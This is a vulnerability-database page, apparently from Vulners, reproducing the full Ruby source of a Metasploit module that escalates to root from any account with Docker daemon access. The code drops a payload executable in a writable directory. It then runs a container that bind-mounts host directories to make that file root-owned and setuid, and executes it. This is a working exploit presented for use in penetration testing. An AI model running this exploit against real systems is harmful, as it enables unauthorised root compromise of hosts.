Lucene search
K

Docker Daemon Privilege Escalation

🗓️ 28 Jun 2016 08:24:41Reported by forzoniType 
metasploit
 metasploit
🔗 www.rapid7.com👁 50 Views

Docker Daemon Privilege Escalation module for obtaining root privileges from any host account with Docker daemon access

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info={})
    super(update_info(info, {
      'Name'           => 'Docker Daemon Privilege Escalation',
      'Description'    => %q{
        This module obtains root privileges from any host account with access to the
        Docker daemon. Usually this includes accounts in the `docker` group.
      },
      'License'        => MSF_LICENSE,
      'Author'         => ['forzoni'],
      'DisclosureDate' => '2016-06-28',
      'Platform'       => 'linux',
      'Arch'           => [ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_MIPSLE, ARCH_MIPSBE],
      'Targets'        => [ ['Automatic', {}] ],
      'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 60 },
      'SessionTypes'   => ['shell', 'meterpreter'],
      'DefaultTarget'  => 0
      }
    ))
    register_advanced_options([
      OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"])
    ])
  end

  def base_dir
    datastore['WritableDir'].to_s
  end

  def check
    if cmd_exec('docker ps && echo true') =~ /true$/
      print_good("Docker daemon is accessible.")
      Exploit::CheckCode::Vulnerable
    else
      print_error("Failed to access Docker daemon.")
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    if !datastore['ForceExploit'] && is_root?
      fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    if nosuid? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is mounted nosuid"
    end

    pl = generate_payload_exe
    exe_path = "#{base_dir}/#{rand_text_alpha(6..11)}"
    print_status("Writing payload executable to '#{exe_path}'")

    write_file(exe_path, pl)
    register_file_for_cleanup(exe_path)

    print_status("Executing script to create and run docker container")
    vprint_status cmd_exec("chmod +x #{exe_path}")
    vprint_status shell_script(exe_path)
    vprint_status cmd_exec("sh -c '#{shell_script(exe_path)}'")

    print_status "Waiting #{datastore['WfsDelay']}s for payload"
  end

  def shell_script(exploit_path)
    deps = %w(/bin /lib /lib64 /etc /usr /opt) + [base_dir]
    dep_options = deps.uniq.map { |dep| "-v #{dep}:#{dep}" }.join(" ")

    %Q{
      IMG=`(echo "FROM scratch"; echo "CMD a") | docker build -q - | awk "END { print \\\\$NF }"`
      EXPLOIT="chown 0:0 #{exploit_path}; chmod u+s #{exploit_path}; chmod +x #{exploit_path}"
      docker run #{dep_options} $IMG /bin/sh -c "$EXPLOIT"
      docker rmi -f $IMG
      #{exploit_path}
    }.strip.split("\n").map(&:strip).join(';')
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Feb 2023 07:17Current
10High risk
Vulners AI Score10
50